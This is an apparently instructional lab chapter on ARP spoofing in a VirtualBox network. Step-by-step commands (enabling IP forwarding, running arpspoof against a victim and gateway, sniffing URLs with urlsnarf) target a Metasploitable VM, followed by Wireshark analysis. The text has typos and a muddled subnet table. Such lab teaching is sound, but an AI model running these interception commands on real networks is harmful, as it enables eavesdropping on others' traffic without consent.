Chapter 10 Arp Spoofing
In this lab we will discuss arp spoofing. Arp spoofing is attack it which an attacker tricks a victim into believing that they are another machine, by pretenting that their MAC address maps to ipaddress that is not their own.
Virtual box emulates a virtual network with a virtual gateway. To determine the IP address of the default gateway you need to determine the ipaddress of kali linux virtual machine and it’s subnet gateway.
10.2 Determining router gateway.
Step 1 Determine the ipaddress and subnet mask by typing the ipconfig command.
[Include picture with subnetmask and ipaddress highlighted]
Step 2 Calculate the default gateway, by anding the subnet mask with you ip address and adding 1. The resulting number if your default gateway.:
|Kali Ip Binary||0000 1010||0000 0000||0000 0010||0000 0100|
|Mask in Binary||1111 1111||1111 1111||1111 1111||0|
|Mask & Ip + 1||10||0||2||1|
Great now that we have determined the ipaddress of the our virtual gateway. We can trick the metasploitable machine on our virtual network into thinking that we are the default gateway so that all network traffic gets forward by switch to our machine. We do this my sending packet that falsely tell the metasploitable machine that mac address of Kali Mahchine is associated the IP-address of the default gateway. This means that all traffic that was intended for the default gateway will now get routed to the Kali Linux box.
[Include ARP spoofing picture below]
Step 3 Type: ip route|grep default , get the router ip
Step 4 On your attacker type: echo ‘1’ > /proc/sys/net/ipv4/ip_forward
Step 5 On the attacker type: arpspoof -i eth0 -t VICTIMIP ROUTERIP
Step 6 On the attacker, in another terminal type: urlsnarf -i eth0
Step 7 On the victim open firefox and navigate. If you’ve done everything right, now you will see the traffic on the attacker.
Step 8 On the attacker: press ctrl+c on the arp terminal window to fix the arp table and shut down the attack
10.3 Analyzing the Network Traffic Associated with the ARP request.
Close both VMs and open the packet capture in wireshark. Look for the ARP messages between the attacker, victim, and router.